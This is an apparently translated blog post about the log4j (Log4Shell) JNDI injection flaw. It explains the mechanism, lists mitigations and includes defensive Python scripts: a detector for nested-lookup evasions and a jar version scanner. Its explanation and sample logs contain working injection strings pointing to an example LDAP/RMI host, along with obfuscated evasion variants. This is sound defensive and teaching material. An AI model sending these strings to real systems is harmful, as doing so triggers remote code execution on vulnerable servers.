Information security - Epic vulnerability log4j vulnerability mechanism and preventive measures
2022-07-06 15:46:00 【Empty one by one】
Recently, R&D colleagues must have been worn down by the log4j vulnerability, patching it at 2 a.m. one round after another. No sooner was one version fixed than bypasses of 2.15 and 2.16 surfaced, pushing the fix up to 2.17. Trouble, trouble, trouble.

Having been through it, we should understand what the log4j vulnerability is, how it is exploited, and what the consequences are.
log4j has two vulnerability mechanisms; without further ado, here are the two attack paths shown in the figures:
1. Use log4j to trigger an LDAP lookup, and use the LDAP naming-reference lookup as the attack path
2. Use log4j to trigger an RMI lookup as the attack path
Normally we log something like logger.info("this is a log content"); and the string this is a log content is written to the log file.
However, for certain special strings, such as logger.info("${jndi:ldap://172.20.0.188:1099/evil}");, log4j2 parses the string before writing it out. It finds ${ in the string, treats that part separately, and recognises it as a JNDI lookup.
It then parses the JNDI expression further: the protocol is LDAP, the LDAP server is 172.20.0.188:1099, and the key being looked up is evil, so it calls the LDAP handler to request the corresponding data. And here is the problem! JNDI supports a mechanism called Naming References, which means JNDI can download a class file from a remote location in order to construct an object. After downloading it, it loads the class and instantiates the object. That is an astonishing thing for a logging call to do.
If the remote URL points to the attacker's server (http://172.20.0.188:80/excute.class) and the downloaded class file contains malicious code, it is already too late: anything can happen. This is JNDI injection. One caveat a practitioner should know: on newer JDKs (8u191 and later) the LDAP codebase is not trusted by default, so this exact remote-class-loading path is closed, but returning a reference to a class that already exists on the application's classpath, or a serialized object, still achieves code execution, so the JDK version reduces exposure without removing it.
Protection and solutions
1. Check the code and upgrade to a safe version promptly. This vulnerability also affects many Apache open-source projects that bundle log4j, so those must be updated as well; use the latest version, 2.17.0 or a later release.
2. Malicious traffic may contain jndi:ldap:// or jndi:rmi://; IDS and WAF rules can be written to pick attack traffic out of the flow. Note that attackers nested lookups such as ${${lower:j}ndi:...} to evade plain string matches, so the rules need to normalise those forms.
3. Add the JVM startup parameter -Dlog4j2.formatMsgNoLookups=true
4. Modify the configuration file (log4j2.component.properties): log4j2.formatMsgNoLookups=true
5. Set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true (this is the variable name log4j reads; the name FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS that circulated in some advisories is not). Items 3 to 5 only exist on 2.10 through 2.14.1 and were later judged insufficient in some configurations (the 2.15/2.16 bypasses mentioned above), so they are a stopgap, not a substitute for upgrading.
6. Shut down unnecessary outbound internet access;
7. Disable lookups or the JNDI service; for versions before 2.10, where the setting above does not exist, remove the lookup class from the jar: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
8. Upgrade the JDK to the latest version.
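As an added example (not code from the original post), the following Python script shows what rule 2 above has to cope with: it normalises the nested-lookup evasions innermost-first, the way log4j itself would evaluate them, and only then matches for a JNDI lookup, running the check over a few constructed access-log lines. The sample lines, the set of fallback prefixes and the list of JNDI schemes are this example's own assumptions, not something the post specifies.

```python
import re

# Innermost ${...} with no nested braces inside; resolving these first, repeatedly,
# collapses the nested payloads attackers used to evade plain "${jndi:" matches.
LOOKUP_RE = re.compile(r"\$\{([^${}]*)\}")

# Lookup prefixes that yield nothing for an attacker-chosen nonsense key, so a
# payload such as ${env:NaN:-j} relies on log4j falling back to the default
# after ":-". Assumed set for this example; extend to taste.
FALLBACK_PREFIXES = {"", "env", "sys", "ctx", "main", "bundle", "k8s", "spring",
                     "docker", "web"}

# What a normalised Log4Shell probe looks like; the scheme list follows common
# IDS/WAF rules. The "jndi" prefix is matched case-insensitively, as log4j does.
JNDI_RE = re.compile(r"\$\{jndi:(ldaps?|rmi|dns|iiop|corba|nds)://", re.IGNORECASE)


def resolve_simple(var):
    """Statically evaluate one innermost ${var} the way log4j would.

    Returns the substituted text, or None when the value cannot be known here
    (a jndi lookup, a real env/sys value without a default, an unknown lookup).
    """
    key, has_default, default = var.partition(":-")   # ${key:-default}
    prefix, has_colon, arg = key.partition(":")        # ${prefix:arg}
    prefix = prefix.lower()
    if prefix == "jndi":
        return None
    if has_colon and prefix == "lower":
        return arg.lower()
    if has_colon and prefix == "upper":
        return arg.upper()
    if has_default and (prefix in FALLBACK_PREFIXES or not has_colon):
        return default
    return None


def normalize(text, max_passes=32):
    """Collapse nested lookups innermost-first until nothing more resolves."""
    for _ in range(max_passes):
        changed = False

        def substitute(match):
            nonlocal changed
            resolved = resolve_simple(match.group(1))
            if resolved is None:
                return match.group(0)          # leave unresolvable lookups in place
            changed = True
            return resolved

        text = LOOKUP_RE.sub(substitute, text)
        if not changed:
            break
    return text


def detect(text):
    """Return (scheme, normalised_text) if text carries a JNDI lookup, else None."""
    normalised = normalize(text)
    match = JNDI_RE.search(normalised)
    if match is None:
        return None
    return match.group(1).lower(), normalised


def scan(lines):
    """Run detect over log lines; returns a list of (line_number, scheme, normalised_line)."""
    hits = []
    for number, line in enumerate(lines, start=1):
        result = detect(line)
        if result is not None:
            hits.append((number, result[0], result[1]))
    return hits


# Constructed sample access-log lines (not real traffic): lines 1 and 6 are benign,
# 2 is the plain payload from the post, 3 to 5 are nested evasion forms.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:09:14:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:09:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://172.20.0.188:1099/evil}"',
    '10.0.0.9 - - [10/Dec/2021:09:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:l}dap://172.20.0.188:1099/evil}"',
    '10.0.0.9 - - [10/Dec/2021:09:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://172.20.0.188:1099/evil}"',
    '10.0.0.9 - - [10/Dec/2021:09:14:13 +0000] "GET / HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${env:NaN:-l}dap://172.20.0.188:1099/evil}"',
    '10.0.0.7 - - [10/Dec/2021:09:14:20 +0000] "GET /report?year=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.68.0"',
]

if __name__ == "__main__":
    for number, scheme, line in scan(SAMPLE_LOG):
        print(f"line {number}: jndi via {scheme}: {line}")
```

The design point is that the detector never matches on the raw request: it first plays the part of log4j's string substitutor for the handful of lookups attackers used as building blocks, so a rule written against the normalised form catches the variants without a regex per trick.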
Thinking about building emergency-response capability, prompted by the log4j vulnerability
1. Specification for introducing open-source components: consider standardising log4j and other open-source components so that only a few common versions need to be introduced. After a security review these are stored in the company's Maven private repository for R&D to use; other, unverified versions may not be introduced. Any additional version that needs to enter the private repository goes through approval and security verification before being added.
2. Development model: all component packages are managed through Java dependency management, with component dependencies imported through a parent POM. Each component upgrade then only requires upgrading the parent POM; other programs that use the component just recompile and pull the latest package to complete the upgrade, without changing their own POM.
3. CI/CD deployment platform: the platform must have control over, and the ability to react to, the deployment and startup of every program. For example, the shell startup scripts of Java programs must be platformised on the CI/CD deployment platform, so that the platform can uniformly modify the startup command and perform the restart, giving it the ability to respond quickly.
4. Asset platform: it must be clear which applications are reachable from the internet, which open-source components those applications use, and the version of each component. The asset platform then lets us quickly locate the risk status of existing applications.
5. Code detection platform: periodically match the vulnerable versions of open-source components listed in CVEs against the versions in use, raising an alarm and triggering the alarm-handling process on a match.
6. From a zero-trust perspective, the zero-trust platform can play a role in the log4j vulnerability: under the zero-trust model of trusting only an allow list, every call from the company intranet to an external interface must be registered on the zero-trust platform, and any untrusted call chain that is found triggers an alarm immediately.
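Items 4 and 5 above come down to one concrete question: which archives on a host contain which log4j-core version, and is JndiLookup still inside them? The following Python scanner is an added example, not part of the original post or of any log4j tooling. It answers that question for a directory of jars, wars and ears, recursing into nested archives, and classifies versions against the thresholds the post gives (2.15/2.16 incomplete, 2.17.0 fixed) while also recognising jars hardened by removing JndiLookup.class. The status labels and the constructed sample jar/war builders are this example's own assumptions.

```python
import io
import re
import sys
import zipfile
from pathlib import Path

# Entries inside a log4j-core jar that tell us what we are looking at.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
FILENAME_VERSION = re.compile(r"log4j-core-(\d[\w.-]*)\.jar$")
NESTED_ARCHIVE = (".jar", ".war", ".ear", ".zip")


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); pre-release suffixes such as '2.0-beta9' are
    reduced to their numeric parts, which is good enough for ordering here."""
    return tuple(int(part) for part in re.findall(r"\d+", text)[:3])


def classify(version, has_jndi_lookup):
    """Map a log4j-core version plus JndiLookup presence to a remediation status.
    The labels are this example's own convention."""
    if version is None:
        return "jndi-lookup-present-unknown-version" if has_jndi_lookup else "unknown"
    if parse_version(version) >= (2, 17, 0):
        return "fixed"
    if not has_jndi_lookup:
        return "mitigated-class-removed"      # JndiLookup.class stripped from the jar
    if parse_version(version) >= (2, 15, 0):
        return "incomplete-fix"               # 2.15.x / 2.16.x, bypassed as the post notes
    return "vulnerable"


def scan_archive(data, name, depth=0):
    """Inspect one archive (given as bytes) and any archives nested inside it."""
    findings = []
    try:
        archive = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    with archive:
        names = set(archive.namelist())
        version = None
        if POM_PROPERTIES in names:        # Maven-built jars record their version here
            for line in archive.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        if version is None:                # fall back to the conventional file name
            match = FILENAME_VERSION.search(name)
            if match:
                version = match.group(1)
        has_jndi_lookup = JNDI_LOOKUP_CLASS in names
        if version is not None or has_jndi_lookup:
            findings.append({"archive": name, "version": version,
                             "jndi_lookup": has_jndi_lookup,
                             "status": classify(version, has_jndi_lookup)})
        if depth < 4:                      # fat jars, wars and ears carry log4j-core inside
            for inner in sorted(names):
                if inner.lower().endswith(NESTED_ARCHIVE):
                    findings.extend(scan_archive(archive.read(inner), f"{name}!{inner}", depth + 1))
    return findings


def scan_tree(root):
    """Walk a directory and scan every archive in it; returns the findings list."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in NESTED_ARCHIVE:
            findings.extend(scan_archive(path.read_bytes(), str(path)))
    return findings


def build_sample_jar(version, include_jndi_lookup=True):
    """Constructed stand-in for a log4j-core jar (only the entries this scanner
    reads), so the example runs without a real log4j download."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as jar:
        jar.writestr(POM_PROPERTIES, f"groupId=org.apache.logging.log4j\n"
                                     f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi_lookup:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")   # class-file magic only
    return buffer.getvalue()


def build_sample_war(jar_bytes, jar_name="WEB-INF/lib/log4j-core.jar"):
    """Constructed war that nests the given jar, to exercise nested-archive handling."""
    buffer = io.BytesIO()
    with zipfile.ZipFile(buffer, "w") as war:
        war.writestr(jar_name, jar_bytes)
    return buffer.getvalue()


if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = scan_tree(sys.argv[1])
    else:   # no directory given: demonstrate on the constructed samples
        results = scan_archive(build_sample_jar("2.14.1"), "log4j-core-2.14.1.jar")
        results += scan_archive(build_sample_war(build_sample_jar("2.16.0")), "app.war")
    for finding in results:
        print(f"{finding['status']:36} {finding['version'] or '?':10} {finding['archive']}")
```

Run it as python scanner.py /opt/apps to inventory a host; the nested "war!jar" naming in the output is what lets the asset platform tie a finding back to the application that shipped it rather than to a bare library file.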